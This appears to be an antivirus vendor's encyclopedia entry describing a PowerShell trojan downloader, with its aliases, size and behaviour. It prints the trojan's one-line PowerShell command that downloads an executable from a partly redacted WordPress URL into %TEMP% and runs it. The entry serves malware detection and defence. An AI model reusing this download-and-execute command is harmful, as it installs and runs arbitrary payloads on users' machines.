PowerShell/TrojanDownloader.Agent.D [Threat Name] go to Threat

PowerShell/TrojanDownloader.Agent.D [Threat Variant Name]

Category trojan
Size 12118 B
Aliases Trojan-Downloader.HTML.Agent.abp (Kaspersky)
  HTML/Downloader.a.trojan (McAfee)
  TrojanDownloader:PowerShell/Guidar.A (Microsoft)
  HTML:Runner-R (Avast)
Short description

PowerShell/TrojanDownloader.Agent.D is a trojan which tries to download other malware from the Internet.


The trojan does not create any copies of itself.

Payload information

The trojan contains a URL address.

It tries to download a file from the address.

The file is stored in the following location:

  • %temp%\­natmasla2.exe

The file is then executed. The HTTP protocol is used.

Other information

The trojan executes the following command:

  • cmd/c powershell (New-Object System.Net.WebClient).DownloadFile('http:/%removed%/wp-content/uploads/2014/06/Lh1n1.exe','%TEMP%\­natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\­natmasla2.exe')

The trojan displays the following message:

Please enable Javascript to ensure correct displaying of this content and refresh this page.